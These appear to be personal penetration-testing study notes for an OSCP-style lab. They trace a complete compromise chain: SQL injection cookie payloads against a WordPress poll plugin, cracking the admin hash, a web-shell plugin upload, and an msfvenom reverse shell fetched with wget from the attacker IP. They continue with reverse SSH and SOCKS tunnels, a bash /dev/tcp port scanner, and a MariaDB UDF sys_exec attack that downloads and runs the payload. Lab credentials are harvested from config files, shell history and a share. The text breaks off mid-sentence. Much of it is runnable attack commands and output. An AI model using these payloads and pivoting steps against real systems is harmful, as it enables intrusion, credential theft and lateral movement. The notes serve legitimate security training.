https://www.youtube.com/watch?v=qiXPM4O427A

  1. Organize your notes and know which machines you need to target and their point values.
  2. Start autorecon on the four machines other than the buffer overflow one, then work on the buffer overflow while it runs (the scans should be done within the first hour).

Study Notes - 2021/07/11

Penetration Example

Add host name (optional): map sandbox.local to the target IP in /etc/hosts so the commands below can use the name.

Enumeration

nmap scan

└─$ sudo nmap -sC -sS -p0-65535 sandbox.local
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-11 12:49 EDT
Nmap scan report for sandbox.local (10.11.1.250)
Host is up (0.025s latency).
Not shown: 65534 filtered ports
PORT STATE SERVICE
22/tcp open ssh
| ssh-hostkey:
| 2048 86:8f:89:36:79:2f:44:b2:61:18:a4:fb:d5:a1:f3:43 (RSA)
| 256 de:f3:84:f1:cd:f3:c8:9a:30:6d:60:e8:b1:1d:99:27 (ECDSA)
|_ 256 14:6a:ba:77:e0:57:e5:0c:c0:cc:76:31:91:8d:dd:9f (ED25519)
80/tcp open http
|_http-generator: WordPress 5.3
|_http-title: SandBox &#8211; See the future, Feel the shine

Nmap done: 1 IP address (1 host up) scanned in 126.77 seconds

autorecon: autorecon -t target.txt

Targeting the web application

The nmap scan indicates the page is generated by WordPress 5.3; its themes and plugins are likely targets.

Perform a basic directory brute force to discover any sensitive files and confirm it is actually WordPress.

autorecon's results are stored in "results/scan/tcp_80_http_feroxbuster.txt" (autorecon uses feroxbuster).
Some common WordPress paths found on the target:

301        9l       28w      317c http://sandbox.local/wp-admin
301 9l 28w 319c http://sandbox.local/wp-content
200 0l 0w 0c http://sandbox.local/wp-blog-header.php
200 0l 0w 0c http://sandbox.local/wp-config.php
301 9l 28w 320c http://sandbox.local/wp-includes
200 0l 0w 0c http://sandbox.local/wp-cron.php
200 11l 23w 220c http://sandbox.local/wp-links-opml.php
200 0l 0w 0c http://sandbox.local/wp-load.php
200 91l 324w 4874c http://sandbox.local/wp-login.php
403 121l 315w 2709c http://sandbox.local/wp-mail.php
302 0l 0w 0c http://sandbox.local/wp-signup.php

The tutorial uses dirb:

dirb http://sandbox.local
==> DIRECTORY: http://sandbox.local/wp-admin/
==> DIRECTORY: http://sandbox.local/wp-content/
==> DIRECTORY: http://sandbox.local/wp-includes/

dirb recurses into each directory it finds (-r turns that off).

Use wpscan for the WordPress vulnerability scan:

wpscan --url sandbox.local --enumerate ap,at,cb,dbe -o wpscan.txt -f cli-no-color

--enumerate includes "All Plugins" (ap), "All Themes" (at), "Config backups" (cb) and "Db exports" (dbe).

wpscan found these plugins:

elementor
ocean-extra
wp-survey-and-poll

Searching searchsploit by plugin name finds nothing; searching for "survey poll" does:
searchsploit wordpress survey poll
------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------ ---------------------------------
WordPress Plugin Survey & Poll 1.5.7.3 - 'sss_params' SQL Injecti | php/webapps/45411.txt
WordPress Plugin Survey and Poll 1.1 - Blind SQL Injection | php/webapps/36054.txt
------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results

wpscan indicates the plugin version could be 1.5.7.3, matching the first entry.

Look at its description:

less /usr/share/exploitdb/exploits/php/webapps/45411.txt
["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,@@version,11#"]

The injection lives in the plugin's cookie: its value is a JSON array whose first element is closed off with ')) and extended with a UNION, and # comments out the rest of the original query.

Use Burp Suite to intercept the communication.

Use Burp Repeater: Proxy -> HTTP history -> find the request -> Send to Repeater.

Replace the cookie value with:

["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,@@version,11#"]

and send it to the server. The response contains the database version: 10.3.20-MariaDB

Get a list of tables:

["1650149780')) OR 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,table_name,11 FROM information_schema.tables#"]

An interesting table: wp_users. Find its columns:

["16232480')) OR 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,column_name,11 FROM information_schema.columns where table_name='wp_users'#"];

[\"ID\"],[\"user_login\"],[\"user_pass\"],[\"user_nicename\"],[\"user_email\"],[\"user_url\"],[\"user_registered\"],[\"user_activation_key\"],[\"user_status\"],[\"display_name\"]]}

Get the login name:

["16232480')) OR 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,user_login,11 FROM wp_users#"];

wp_ajla_admin

Get the password hash:

["16232480')) OR 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,user_pass,11 FROM wp_users where user_login='wp_ajla_admin'#"];

The result is a hash:

[\"$P$BfBIi66MsPQgzmvYsUzwjc5vSx9L6i\\\/\"]
$P$BfBIi66MsPQgzmvYsUzwjc5vSx9L6i/

The JSON output escapes the trailing / as \/ (doubly escaped in the response, hence \\\/); the real hash ends in a single /.

Crack the hash with john and the rockyou wordlist ($P$ is the phpass "portable" format WordPress uses):
echo '$P$BfBIi66MsPQgzmvYsUzwjc5vSx9L6i/' > pass.txt

john --wordlist=/usr/share/wordlists/rockyou.txt pass.txt
Using default input encoding: UTF-8
Loaded 1 password hash (phpass [phpass ($P$ or $H$) 128/128 AVX 4x3])
Cost 1 (iteration count) is 8192 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
!love29jan2006! (?)
1g 0:00:19:52 DONE (2021-07-11 15:22) 0.000838g/s 12018p/s 12018c/s 12018C/s !luv2:P..!lilkilla!
Use the "--show --format=phpass" options to display all of the cracked passwords reliably
Session completed

Log in to the WordPress admin at http://sandbox.local/wp-admin with wp_ajla_admin / !love29jan2006!
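The $P$ string john just cracked is a phpass portable hash. As an added example that is not part of these notes, here is the format implemented in Python, so the fields john reports can be read straight off the string and a candidate can be checked without john: the fourth character encodes log2 of the iteration count ('B' is index 13, so 2^13 = 8192, exactly john's "Cost 1 (iteration count) is 8192"), the next eight characters are the salt, and the rest is phpass's own base64 of md5 iterated that many times. PAGE_HASH is the value recovered above; the function names are mine.

```python
"""phpass portable hashes ($P$...), the format of WordPress wp_users.user_pass."""
import hashlib
import os

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"

# Hash pulled out of wp_users on sandbox.local (from the notes above).
PAGE_HASH = "$P$BfBIi66MsPQgzmvYsUzwjc5vSx9L6i/"


def _encode64(data: bytes, count: int) -> str:
    """phpass's base64 variant: 6-bit groups taken little-endian, no padding."""
    out, i = [], 0
    while i < count:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < count:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= count:
            break
        i += 1
        if i < count:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= count:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)


def parse_setting(setting: str):
    """Split a $P$/$H$ string into (iteration count, salt); ValueError if malformed."""
    if len(setting) < 12 or setting[:3] not in ("$P$", "$H$"):
        raise ValueError("not a phpass portable hash")
    count_log2 = ITOA64.index(setting[3])
    if not 7 <= count_log2 <= 30:
        raise ValueError("iteration count out of range")
    return 1 << count_log2, setting[4:12]


def phpass_hash(password: str, salt: str, count_log2: int = 13) -> str:
    """$P$ + count char + salt + encode64(h), h = md5(salt+pw) then md5(h+pw) 2**count_log2 times."""
    assert len(salt) == 8 and all(c in ITOA64 for c in salt)
    pw = password.encode()
    h = hashlib.md5(salt.encode() + pw).digest()
    for _ in range(1 << count_log2):
        h = hashlib.md5(h + pw).digest()
    return "$P$" + ITOA64[count_log2] + salt + _encode64(h, 16)


def verify_phpass(password: str, setting: str) -> bool:
    count, salt = parse_setting(setting)
    return phpass_hash(password, salt, count.bit_length() - 1) == setting


def new_salt() -> str:
    """8 salt characters from 6 random bytes, as phpass generates them."""
    return _encode64(os.urandom(6), 6)


if __name__ == "__main__":
    print(parse_setting(PAGE_HASH))                       # (8192, 'fBIi66Ms')
    print(verify_phpass("!love29jan2006!", PAGE_HASH))     # john's candidate from the notes
```

The iteration count is why john reports only about 12k candidates per second here: each guess costs 8193 MD5 calls, which is the whole point of the $P$ format compared with the bare MD5 seen on Vaccine.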

Enumerating the admin interface

For WordPress, look at the Info tab: Tools -> Site Health -> Info
Server:
Server architecture Linux 4.4.0-21-generic x86_64
Web server Apache/2.4.18 (Ubuntu)
PHP version 7.0.33-0ubuntu0.16.04.7 (Supports 64bit values)

Database:
Extension mysqli
Server version 10.3.20-MariaDB
Client version mysqlnd 5.0.12-dev - 20150407 - $Id: b5c5906d452ec590732a93b051f3827e02749b83 $
Database user wp
Database host 10.5.5.11

The database runs on 10.5.5.11, a different host from the one we are targeting (10.11.1.250).

As admin we can install our own plugins, and SecLists ships a malicious WordPress plugin:

/usr/share/seclists/Web-Shells/WordPress/plugin-shell.php

Uploading the bare PHP file gives an error:

The package could not be installed. PCLZIP_ERR_BAD_FORMAT (-10) : Unable to find End of Central Dir Record signature

The plugin installer expects a zip archive, so pack the file (-j drops the directory path so plugin-shell.php sits at the root of the archive, which is where the URL used below expects it):

zip -j bad_plugin.zip /usr/share/seclists/Web-Shells/WordPress/plugin-shell.php

then upload it.

Activating it fails:

Plugin could not be activated because it triggered a fatal error.

It does not need to be activated: the file is already on disk under wp-content/plugins/ and Apache serves it directly.

Test:

http://sandbox.local/wp-content/plugins/bad_plugin/plugin-shell.php?cmd=id

It works, so next generate a reverse shell.

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.119.165 LPORT=443 -f elf > shell.elf

The target is a Linux machine; LPORT=443 is chosen so the callback looks like HTTPS and gets through outbound firewall rules.

Upload the binary to the target: serve it from a Python web server in the current directory

sudo python3 -m http.server 80

and download it through the web shell:

curl http://sandbox.local/wp-content/plugins/bad_plugin/plugin-shell.php?cmd=wget%20http://192.168.119.165/shell.elf

%20 is the URL-encoded space.

Start the handler:
kali@kali:~$ sudo msfconsole -q -x "use exploit/multi/handler;\
> set PAYLOAD linux/x86/meterpreter/reverse_tcp;\
> set LHOST 192.168.119.165;\
> set LPORT 443;\
> run"

Before executing the shell, check its permissions and make it executable:

curl http://sandbox.local/wp-content/plugins/bad_plugin/plugin-shell.php?cmd=ls%20-l%20shell.elf
# change the permission (+x is enough; 777 is what the notes used)
curl http://sandbox.local/wp-content/plugins/bad_plugin/plugin-shell.php?cmd=chmod%20777%20shell.elf

Run it:

curl http://sandbox.local/wp-content/plugins/bad_plugin/plugin-shell.php?cmd=./shell.elf

In meterpreter, the shell command drops to a regular shell.

Post-Exploitation Enumeration

Gather basic information: network configuration, hostname, OS version and kernel:
ifconfig
ens160 Link encap:Ethernet HWaddr 00:50:56:bf:19:da
inet addr:10.4.4.10 Bcast:10.4.4.255 Mask:255.255.255.0
inet6 addr: fe80::250:56ff:febf:19da/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:158345 errors:0 dropped:240 overruns:0 frame:0
TX packets:169172 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:122457155 (122.4 MB) TX bytes:68118761 (68.1 MB)

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:732 errors:0 dropped:0 overruns:0 frame:0
TX packets:732 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1
RX bytes:67520 (67.5 KB) TX bytes:67520 (67.5 KB)

hostname
ajla

uname -a
Linux ajla 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux

cat /etc/issue
Ubuntu 16.04 LTS \n \l

cat /proc/version
Linux version 4.4.0-21-generic (buildd@lgw01-21) (gcc version 5.3.1 20160413 (Ubuntu 5.3.1-14ubuntu2) ) #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016

The database credentials are in the WordPress configuration file wp-config.php:
pwd
/var/www/html

cat wp-config.php
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress' );

/** MySQL database username */
define( 'DB_USER', 'wp' );

/** MySQL database password */
define( 'DB_PASSWORD', 'Lv9EVQq86cfi8ioWsqFUQyU' );

/** MySQL hostname */
define( 'DB_HOST', '10.5.5.11' );

/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );

/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

define( 'WP_HTTP_BLOCK_EXTERNAL', true );

Creating a stable pivot point

Next we want to reach the internal network, e.g. the database server 10.5.5.11. We do not have root on ajla and so cannot start an SSH server there; use a reverse SSH tunnel back to Kali instead.

First find out which port the database server listens on, with a quick bash port scan (no nmap on the target; /dev/tcp is a bash feature):

#!/bin/bash
# Connect-scan every TCP port on $host using bash's /dev/tcp pseudo-device.
# timeout .1 gives up on filtered ports quickly; stderr is silenced so
# "Connection refused" messages do not drown the output.
host=10.5.5.11
for port in {1..65535}; do
timeout .1 bash -c "echo >/dev/tcp/$host/$port" 2>/dev/null &&
echo "port $port is open"
done
echo "Done"

Upload the script with meterpreter and run it:

upload ~/script/portscan.sh /tmp/portscan.sh

chmod +x portscan.sh
./portscan.sh
port 3306 is open

3306 is the default MariaDB/MySQL port.

ssh -R 1122:10.5.5.11:22 -R 13306:10.5.5.11:3306 kali@192.168.119.165

This makes Kali's ports 1122 and 13306 forward through ajla to the database host. But it prompts for 1. accepting the host key and 2. the password, which a non-interactive web shell cannot answer.

ssh -R 1122:10.5.5.11:22 -R 13306:10.5.5.11:3306 -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" kali@192.168.119.165

UserKnownHostsFile=/dev/null: do not save host keys
StrictHostKeyChecking=no: do not prompt about unknown host keys

To avoid the password prompt, generate an SSH key pair on the target machine and authorise its public key on Kali:

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDBK2RDq8McGN6Av2gpVYvS6nwi6r10XFYVQsQAxQLDwaprw4pJObKgcpgXkgj48cSLCJ8473Jv3y8FUpqgN8sX3EJseG43ni45kP/i3yQJ7sTmbG6/ZsIdxZM4dC9oK9JbHTnko/8d24lJMxAGwvskjFpCRjcBu1OVUmRziWFTG5v6zVaebvFt2DlP3XaDPZysZg4+Xh5iS+/T73aarEJbLz5EEz7Nnq06bHvMOn/hQqqiIZ6jgHVzSMu7eolt1hh7+CsCjaNctURir4JRCAMjEWmpQ+xy39b6PmqDLbJfKon68Xv685fB6d+O2vJr/lO8KaKEnhEUwRw5GwN45hRT www-data@ajla

In Kali's authorized_keys (one line; the options restrict the key to port forwarding from 10.11.1.250 only, with no shell, no agent forwarding and no X11):

from="10.11.1.250",command="echo 'This account can only be used for port forwarding'",no-agent-forwarding,no-X11-forwarding,no-pty ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDBK2RDq8McGN6Av2gpVYvS6nwi6r10XFYVQsQAxQLDwaprw4pJObKgcpgXkgj48cSLCJ8473Jv3y8FUpqgN8sX3EJseG43ni45kP/i3yQJ7sTmbG6/ZsIdxZM4dC9oK9JbHTnko/8d24lJMxAGwvskjFpCRjcBu1OVUmRziWFTG5v6zVaebvFt2DlP3XaDPZysZg4+Xh5iS+/T73aarEJbLz5EEz7Nnq06bHvMOn/hQqqiIZ6jgHVzSMu7eolt1hh7+CsCjaNctURir4JRCAMjEWmpQ+xy39b6PmqDLbJfKon68Xv685fB6d+O2vJr/lO8KaKEnhEUwRw5GwN45hRT www-data@ajla

In the shell on ajla:

ssh -f -N -R 1122:10.5.5.11:22 -R 13306:10.5.5.11:3306 -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -i /tmp/keys/id_rsa kali@192.168.119.165

-f: go to the background
-N: do not run a remote command, only forward ports

Targeting the database

Through the tunnel, connect as wp (-p prompts for the password, Lv9EVQq86cfi8ioWsqFUQyU from wp-config.php):

mysql --host=127.0.0.1 --port=13306 --user=wp -p

Look at what privileges we have:

SHOW GRANTS;
GRANT USAGE ON *.* TO 'wp'@'%' IDENTIFIED BY PASSWORD '*61163AE4B131AB0E43F07BE7B' |
GRANT SELECT, INSERT, UPDATE, DELETE ON `wordpress`.* TO 'wp'@'%'

Only DML on the wordpress database, no FILE privilege. Check the server details that matter for a UDF attack (architecture and plugin directory):
MariaDB [(none)]> select @@hostname, @@tmpdir, @@version, @@version_compile_machine, @@plugin_dir;
+------------+----------+-----------------+---------------------------+-------------------+
| @@hostname | @@tmpdir | @@version | @@version_compile_machine | @@plugin_dir |
+------------+----------+-----------------+---------------------------+-------------------+
| zora | /var/tmp | 10.3.20-MariaDB | x86_64 | /home/dev/plugin/ |
+------------+----------+-----------------+---------------------------+-------------------+
1 row in set (0.026 sec)

searchsploit maria

None of the exploits work for the current MariaDB version.

Search for the more generic MySQL exploits, since MariaDB is built on MySQL:

searchsploit mysql

UDF (user-defined function) exploits show up often: a user with the FILE privilege writes a shared library into plugin_dir and registers a function from it, which then runs arbitrary commands as the database's OS user.

A useful GitHub repo:

git clone https://github.com/mysqludf/lib_mysqludf_sys.git

To compile it, install some packages:

sudo apt update && sudo apt install default-libmysqlclient-dev libmariadbd-dev

and modify the Makefile so it includes MariaDB's header files.

Convert the .so into a hex string that can be used as a SQL literal:

xxd -p lib_mysqludf_sys.so | tr -d '\n' > lib_mysqludf_sys.so.hex

xxd -p: plain hex dump
tr -d '\n': delete the newlines so it is one long line

mariadb> set @shell=0x7abf.....;
select @@plugin_dir;
select binary @shell into dumpfile '/home/dev/plugin/udf_sys_exec.so';

This fails: SELECT ... INTO DUMPFILE requires the global FILE privilege, and wp has only USAGE on *.* plus SELECT/INSERT/UPDATE/DELETE on wordpress.*, so it cannot write files on zora.
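As an added example (not code from these notes or from the lib_mysqludf_sys project), the Python below does the same job as the xxd/tr/mysql steps above: it builds the 0x... hex literal from a shared object, emits the staging statements, and checks SHOW GRANTS output for the FILE privilege that INTO DUMPFILE needs. The wp grant rows are the ones returned above; the ELF bytes and the root-style grant row are constructed stand-ins.

```python
import re

ELF_MAGIC = b"\x7fELF"   # every real .so literal therefore starts with 0x7f454c46


def so_to_hex_literal(so_bytes: bytes) -> str:
    """Same as `xxd -p lib.so | tr -d '\\n'`, prefixed with 0x so MariaDB parses
    it as a binary literal. Refuses anything that is not an ELF image."""
    if not so_bytes.startswith(ELF_MAGIC):
        raise ValueError("not an ELF shared object")
    return "0x" + so_bytes.hex()


def udf_statements(so_bytes: bytes, plugin_dir: str,
                   soname: str = "udf_sys_exec.so", func: str = "sys_exec") -> list:
    """The statement sequence used in the notes: stage the library under
    @@plugin_dir, register the function, confirm it landed in mysql.func."""
    path = plugin_dir.rstrip("/") + "/" + soname
    return [
        f"SET @shell = {so_to_hex_literal(so_bytes)};",
        # needs the global FILE privilege; also blocked when secure_file_priv
        # restricts writes to a directory other than plugin_dir
        f"SELECT BINARY @shell INTO DUMPFILE '{path}';",
        f"CREATE FUNCTION {func} RETURNS INT SONAME '{soname}';",
        f"SELECT * FROM mysql.func WHERE name = '{func}';",
    ]


# "GRANT <privs> ON <scope> TO ..." as printed by SHOW GRANTS
_GRANT_RE = re.compile(r"^GRANT\s+(.+?)\s+ON\s+(\S+)\s+TO\s", re.IGNORECASE)


def has_file_privilege(show_grants_rows) -> bool:
    """FILE is a global privilege: it only counts when granted ON *.*,
    either by name or through ALL PRIVILEGES."""
    for row in show_grants_rows:
        m = _GRANT_RE.match(row.strip(" |"))
        if not m or m.group(2) != "*.*":
            continue
        privs = {p.strip().upper() for p in m.group(1).split(",")}
        if privs & {"FILE", "ALL PRIVILEGES", "ALL"}:
            return True
    return False


# SHOW GRANTS rows for wp, as returned on zora above
WP_GRANTS = [
    "GRANT USAGE ON *.* TO 'wp'@'%' IDENTIFIED BY PASSWORD '*61163AE4B131AB0E43F07BE7B'",
    "GRANT SELECT, INSERT, UPDATE, DELETE ON `wordpress`.* TO 'wp'@'%'",
]
# constructed stand-in for a root-style grant row (not captured from zora)
ROOT_GRANTS = [
    "GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY PASSWORD '*...' WITH GRANT OPTION",
]
# constructed stand-in for a compiled library: the ELF magic plus padding
FAKE_SO = ELF_MAGIC + b"\x00" * 12

if __name__ == "__main__":
    print("wp can DUMPFILE:  ", has_file_privilege(WP_GRANTS))    # False
    print("root can DUMPFILE:", has_file_privilege(ROOT_GRANTS))  # True
    for stmt in udf_statements(FAKE_SO, "/home/dev/plugin/"):
        print(stmt)
```

Run the grant check first: if it returns False for the current user, the DUMPFILE step is pointless and the effort is better spent on finding higher-privileged database credentials, which is exactly what happened here.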

Go back to ajla and look for database credentials with more privileges (ideally root).

Deeper Enumeration of the Web Application Server

searchsploit ubuntu 16.04

Pick a suitable local privilege escalation exploit, compile it locally, upload it to ajla and run it: we get root.

Then add our SSH public key to root's authorized_keys, after which we can ssh root@sandbox.local straight into ajla.

Search for DB credentials. Inspecting .bash_history turns up:

mysql -u root -pBmDu9xUHKe3fZi3Z7RdMBeb -h 10.5.5.11 -e 'DROP DATABASE wordpress;'

Targeting the database again

mysql --host=127.0.0.1 --port=13306 --user=root -pBmDu9xUHKe3fZi3Z7RdMBeb
mariadb> set @shell=0x7abf.....;
select @@plugin_dir;
select binary @shell into dumpfile '/home/dev/plugin/udf_sys_exec.so';
create function sys_exec returns int soname 'udf_sys_exec.so';
select * from mysql.func where name='sys_exec';

Test whether zora can make a network call back to Kali:

kali> sudo python3 -m http.server 80

Have zora fetch our shell.elf (a request in the http.server log confirms egress works). The relative path is resolved against the mysqld process's working directory, typically the data directory:

select sys_exec('wget http://192.168.119.165/shell.elf');
select sys_exec('chmod +x ./shell.elf');

Make sure the Metasploit handler is ready for the connection: back out of the current sessions to the msfconsole prompt and start the listener again, then trigger the payload from the database:

exit   # exit root shell
exit   # exit shell
exit
run

select sys_exec('./shell.elf');

We get a shell as the mysql user.

cat /etc/issue # get linux version
Alpine Linux 3.10

cat /proc/version # get kernel version
Linux version 4.19.78-0-virt (buildozer@build-3-10-x86_64) (gcc version 8.3.0 (Alpine 8.3.0)) #1-Alpine SMP Thu Oct 10 15:25:30 UTC 2019

uname -a
Linux zora 4.19.78-0-virt #1-Alpine SMP Thu Oct 10 15:25:30 UTC 2019 x86_64 Linux

env

ps ux

netstat -tulpn

cat /etc/fstab

UUID=ede2f74e-f23a-441c-b9cb-156494837ef3 / ext4 rw,relatime 0 1
UUID=8e53ca17-9437-4f54-953c-0093ce5066f2 /boot ext4 rw,relatime 0 2
UUID=ed8db3c1-a3c8-45fb-b5ec-f8e1529a8046 swap swap defaults 0 0
/dev/cdrom /media/cdrom iso9660 noauto,ro 0 0
/dev/usbdisk /media/usb vfat noauto 0 0
//10.5.5.20/Scripts /mnt/scripts cifs uid=0,gid=0,username=,password=,_netdev 0 0

The contents of /etc/fstab are interesting: a CIFS share //10.5.5.20/Scripts is mounted at /mnt/scripts with an empty username and password (guest access), owned by uid/gid 0. Let's poke around the scripts share and see what we find.

cd /mnt/scripts

cat system_report.ps1
# find a better way to automate this
$username = "sandbox\alex"
$pwdTxt = "Ndawc*nRoqkC+haZ"
$securePwd = $pwdTxt | ConvertTo-SecureString
$credObject = New-Object System.Management.Automation.PSCredential -ArgumentList $username, $securePwd

# Enable remote management on Poultry
$remoteKeyParams = @{
ComputerName = "POULTRY"
Path = 'HKLM:\SOFTWARE\Microsoft\WebManagement\Server'
Name = 'EnableRemoteManagement'
Value = '1'
}
Set-RemoteRegistryValue @remoteKeyParams -Credential $credObject

Create a stable reverse tunnel

Generate a key pair as the mysql user on zora:

ssh-keygen
/var/lib/mysql/.ssh/id_rsa

and add the resulting public key to Kali's authorized_keys with the same forwarding-only restrictions as before:

from="10.11.1.250",command="echo 'This account can only be used for port forwarding'",no-agent-forwarding,no-X11-forwarding,no-pty ssh-rsa <public key from /var/lib/mysql/.ssh/id_rsa.pub> mysql@zora

Reverse dynamic port forwarding

ssh -f -N -R 1080 -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -i /var/lib/mysql/.ssh/id_rsa kali@192.168.119.165

With only a port given to -R (supported since OpenSSH 7.6), the SSH server side (Kali) listens on 127.0.0.1:1080 as a SOCKS proxy, and every connection made through it exits from zora, so tools on Kali can reach the 10.5.5.x network without per-port forwards.

Add to /etc/proxychains4.conf:

socks4 127.0.0.1 1080

Targeting Poultry

proxychains nmap --top-ports=20 -sT -Pn 10.5.5.20
PORT STATE SERVICE
21/tcp closed ftp
22/tcp closed ssh
23/tcp closed telnet
25/tcp closed smtp
53/tcp closed domain
80/tcp closed http
110/tcp closed pop3
111/tcp closed rpcbind
135/tcp open msrpc
139/tcp open netbios-ssn
143/tcp closed imap
443/tcp closed https
445/tcp open microsoft-ds
993/tcp closed imaps
995/tcp closed pop3s
1723/tcp closed pptp
3306/tcp closed mysql
3389/tcp open ms-wbt-server
5900/tcp closed vnc
8080/tcp closed http-proxy

-sT  full TCP connect scan: proxychains only relays complete TCP connections, so a SYN scan cannot go through the SOCKS proxy
-Pn  skip host discovery: ICMP and raw probes cannot traverse the proxy either, so without -Pn nmap would report the host as down

Port 3389 (ms-wbt-server) is the RDP service.

Log in with the credentials from system_report.ps1:

proxychains xfreerdp /d:sandbox /u:alex /v:10.5.5.20 +clipboard

/d: domain
/u: user
/v: server host

Let me try rdesktop first:

proxychains rdesktop 10.5.5.20 -d sandbox -u alex -p 'Ndawc*nRoqkC+haZ' -g 1024x768 -r clipboard:PRIMARYCLIPBOARD

C:\Users\alex>systeminfo
Host Name: POULTRY
OS Name: Microsoft Windows 7 Professional
OS Version: 6.1.7601 Service Pack 1 Build 7601
...
Registered Owner: poultryadmin
...
Domain: sandbox.local

netstat -ano

Nothing interesting among the listening ports. Ports 49152 and above are the Windows default dynamic/ephemeral range used for outbound TCP connections, so we don't need to worry about them.

Check whether alex is in an admin group. The group membership line (net user output) shows:

Global Group memberships *Domain Users

alex is a regular domain user.


Study Notes - 2021/07/08

HTTP tunneling through deep packet inspection

Scenario: only a specific protocol is allowed out. E.g. SSH is blocked, and deep packet inspection on the firewall lets only HTTP through. An unused port 1234 is reachable because of a misconfiguration (unusual in a real engagement). The goal is RDP (port 3389) on a Windows host w.x.y.z in the internal subnet.

On the compromised Linux machine, forward a local port to the Windows RDP port; this is not filtered since both hosts are in the internal subnet:

ssh -L 0.0.0.0:8888:w.x.y.z:3389 student@127.0.0.1

Then encapsulate that tunnel in HTTP with httptunnel:

sudo apt install httptunnel

httptunnel is client-server based. On the compromised Linux machine, hts listens on 1234 for HTTP and hands the decapsulated stream to localhost:8888:

student@debian:~$ hts --forward-port localhost:8888 1234

On Kali, htc listens on local port 8080 and wraps whatever connects to it in HTTP towards 10.11.0.128:1234, so an RDP client pointed at 127.0.0.1:8080 ends up on w.x.y.z:3389 and the firewall only ever sees HTTP:

kali@kali:~$ htc --forward-port 8080 10.11.0.128:1234

Study Notes - 2021/07/07

Port Forwarding

RINETD

Default configuration file:

cat /etc/rinetd.conf

bindaddress/bindport: the address and port rinetd listens on; connectaddress/connectport: the destination it forwards to.

# bindadress bindport connectaddress connectport
0.0.0.0 80 216.58.207.142 80

This forwards any connection to port 80 on to Google (216.58.207.142).

sudo service rinetd restart
ss -antp | grep "80"
nc -nvv 10.11.0.4 80

SSH Tunneling

SSH local port forwarding

Scenario:
victim1 is already compromised and only accepts ports 8080, 22 and 3389 from outside. victim1 is connected to another subnet that contains a further target. Moving tools onto victim1 is neither elegant nor scalable; we want to attack from our Kali machine.

-L local_socket:host:hostport
-L local_socket:remote_socket
Specifies that connections to the given TCP port or Unix socket
on the local (client) host are to be forwarded to the given host
and port, or Unix socket, on the remote side. This works by al‐
locating a socket to listen to either a TCP port on the local
side, optionally bound to the specified bind_address, or to a
Unix socket. Whenever a connection is made to the local port or
socket, the connection is forwarded over the secure channel, and
a connection is made to either host port hostport, or the Unix
socket remote_socket, from the remote machine.

-N Do not execute a remote command. This is useful for just for‐
warding ports.

In our scenario, we want to forward port 445 (Microsoft networking without NetBIOS) on our Kali
machine to port 445 on the Windows Server 2016 target. When we do this, any Microsoft file
sharing queries directed at our Kali machine will be forwarded to our Windows Server 2016 target.
This seems impossible given that the firewall is blocking traffic on TCP port 445, but this port
forward is tunneled through an SSH session to our Linux target on port 22, which is allowed
through the firewall. In summary, the request will hit our Kali machine on port 445, will be
forwarded across the SSH session, and will then be passed on to port 445 on the Windows Server
2016 target.

kali@kali:~$ sudo ssh -N -L 0.0.0.0:445:192.168.1.110:445 student@10.11.0.128

sudo is needed because 445 is a privileged port; binding 0.0.0.0 also exposes the forward to anyone who can reach Kali, so bind 127.0.0.1 unless other hosts must use it.

SSH Remote port forwarding

Scenario:

The firewall blocks inbound TCP port 22 (SSH), so we can't SSH into this server from our Internet-connected Kali machine. Instead the compromised host connects out to Kali and opens a listener on Kali's side:

victim1: ssh -N -R 10.11.0.4:2221:127.0.0.1:3306 kali@10.11.0.4

Kali now listens on 10.11.0.4:2221; connections to it travel back over the SSH session and victim1 delivers them to its own 127.0.0.1:3306 (MySQL). Binding a non-loopback address on the server side like this only works if Kali's sshd_config has GatewayPorts yes.

on kali:

kali@kali:~$ sudo nmap -sS -sV 127.0.0.1 -p 2221
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000039s latency).
PORT STATE SERVICE VERSION
2221/tcp open mysql MySQL 5.5.5-10.1.26-MariaDB-0+deb9u1
Nmap done: 1 IP address (1 host up) scanned in 0.56 seconds

Scanning the local port 2221 is effectively scanning the target's MySQL service.

SSH Dynamic port forwarding

kali> ssh -N -D <address to bind to>:<port to bind to> <username>@<SSH server address>

With the above syntax in mind, we can create a local SOCKS4 application proxy (-N -D) on our
